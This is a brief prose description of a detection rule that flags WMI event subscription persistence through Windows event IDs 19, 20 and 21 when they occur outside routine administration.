This rule is designed to detect the creation of WMI (Windows Management Instrumentation) event subscription persistence methods, which are often utilized by attackers to maintain access and persist within a network environment. The detection focuses on specific event IDs related to WMI event subscription activities, namely Event ID 19 (WMI Event Filter), Event ID 20 (WMI Event Consumer), and Event ID 21 (WMI Event Consumer to Filter). These events are significant as they indicate the establishment of mechanisms that can trigger malicious payloads upon the occurrence of specified system events. The rule aims to pinpoint instances of these event creations that occur outside of normal administrative tasks, aiding in the identification of potential adversarial activities.